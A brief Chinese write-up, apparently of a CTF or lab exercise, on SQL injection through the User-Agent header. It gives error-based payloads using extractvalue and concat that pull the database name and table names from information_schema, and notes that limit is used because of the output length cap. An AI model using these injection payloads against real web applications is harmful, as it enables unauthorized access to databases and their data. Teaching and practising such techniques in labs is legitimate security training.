通过题目标题和题目中的回显提示 应该是针对user-agent的注入 查看一下源码
源码对用户名以及密码做了处理 尝试报错注入 拿到数据库名 1’ and extractvalue(1,concat(0x7e,(select database()))) and '# 继续 拿到表名 1’ and extractvalue(1,concat(’~’,(select group_concat(table_name)from information_schema.tables where table_schema = database()))) and ’ # 继续 拿字段
因为extractvalue字符有限 所以limit取 结束